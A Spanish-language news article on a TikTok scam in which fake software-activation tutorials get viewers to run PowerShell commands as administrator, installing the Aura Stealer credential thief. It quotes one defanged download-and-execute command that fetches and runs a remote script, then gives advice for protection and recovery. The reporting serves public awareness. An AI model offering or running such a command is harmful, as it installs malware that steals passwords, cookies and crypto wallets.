En TikTok ha surgido una serie de videos que esconden un fraude al ofrecer falsos tutoriales para obtener otras aplicaciones como Netflix, Windows o Photoshop. Todo con el objetivo de ir tras los datos personales.

La reciente campaña descubierta por el experto en ciberseguridad Xavier Mertens del SANS Internet Storm Center (ISC) y reportada también por Trend Micro, está orientada a quienes buscan soluciones gratuitas en esta red social, un público que suele confiar en la facilidad y accesibilidad de los tutoriales presentados por creadores populares.

Los videos engañosos simulan ofrecer pasos claros y sencillos para acceder a versiones completas de programas de uso habitual, como Windows, Photoshop, Adobe Premiere, CapCut Pro o servicios premium de plataformas reconocidas, incluyendo Netflix y Spotify.

Cada video inicia con el planteo de una necesidad común—activar software pago sin costo, desbloquear funciones especiales o disfrutar de contenido premium—y muestra una supuesta solución técnica en forma de comandos breves listos para copiar y pegar. Los creadores recomiendan a los espectadores ejecutar estos comandos, normalmente en la terminal de PowerShell de Windows y con permisos de administrador.

Por ejemplo, un video puede instruir a los usuarios a escribir un comando como ‘iex (irm slmgr[.]win/photoshop)’ prometiendo que este simple paso bastará para activar algún programa costo.

Lo que resulta clave en estos tutoriales es la sensación de legitimidad: los enlaces y comandos están personalizados para el software anunciado, lo que dificulta detectar el fraude a primera vista. Además, la brevedad y la familiaridad del formato TikTok contribuyen a que muchos usuarios actúen impulsivamente, copiando y ejecutando sin detenerse a evaluar el riesgo.

De acuerdo con los análisis técnicos publicados por Bleeping Computer y especialistas como Mertens, al ejecutar el comando proporcionado, la terminal de PowerShell se conecta automáticamente a un sitio remoto donde descarga y ejecuta otro script malicioso. Este segundo paso no solo perpetúa el engaño, sino que implica una escalada en el nivel de compromiso del dispositivo.

Este script hace que el sistema afectado reciba dos archivos ejecutables mediante servidores alojados en servicios legítimos como Cloudflare Pages.

Según la investigación, el primer ejecutable suele ser una variante del malware Aura Stealer, un spyware de tipo troyano diseñado para sustraer información crítica. Aura Stealer busca las contraseñas almacenadas en los navegadores, cookies de autenticación, billeteras de criptomonedas y credenciales de otras aplicaciones instaladas, y transmite todos estos datos a los servidores controlados por los atacantes.

Así, los ciberdelincuentes pueden acceder a cuentas bancarias, servicios digitales, redes sociales y más.

El resultado para quienes caen en la trampa suele ser severo. Aura Stealer se especializa en traspasar la totalidad de los datos delicados almacenados en el dispositivo infectado. Esto incluye desde el acceso a cuentas de correo electrónico y redes sociales, hasta información financiera o digital contenida en carteras de criptomonedas.

Al tratarse de un troyano polimórfico, Aura Stealer puede modificar su estructura para evadir la detección por parte de antivirus convencionales. Además, su función de loader le permite descargar e instalar módulos adicionales, con lo que el dispositivo corrosponde no solo pierde la privacidad, sino que puede convertirse en parte de una botnet o plataforma para otros ataques, como campañas de ransomware o robo directo de fondos.

La rapidez con que estos ataques se propagan y la variedad de programas y servicios simulados en los videos hacen que cualquier usuario, incluso aquellos con conocimientos técnicos, puedan caer en la trampa. En la medida en que los tutoriales se difunden y los atacantes perfeccionan el engaño, aumenta la cantidad de víctimas afectadas.

Frente a esta modalidad de fraude, la principal recomendación de los especialistas es nunca copiar ni ejecutar comandos facilitados en videos o páginas web de dudosa procedencia, especialmente si prometen la activación gratuita de productos comerciales. Las prácticas seguras exigen escepticismo frente a soluciones demasiado fáciles y el uso de software original.

En caso de haber seguido uno de estos tutoriales, lo aconsejable es proceder a cambiar todas las contraseñas de forma inmediata, incluyendo accesos de correo electrónico, redes sociales, cuentas bancarias y plataformas de streaming.

También es fundamental realizar un escaneo exhaustivo del equipo con herramientas de seguridad actualizadas, eliminar cualquier archivo sospechoso o programa desconocido instalado recientemente y, ante la detección de actividad anómala, desconectar el dispositivo de la red hasta asegurarse de que está limpio.

Por último, mantener el sistema operativo y todas las aplicaciones actualizadas ayuda a bloquear posibles vulnerabilidades que los atacantes podrían explotar con este tipo de técnicas. Aunque el mejor antivirus puede ser de ayuda, no existe protección total si el usuario concede, por propia iniciativa, permisos de administrador a software malicioso.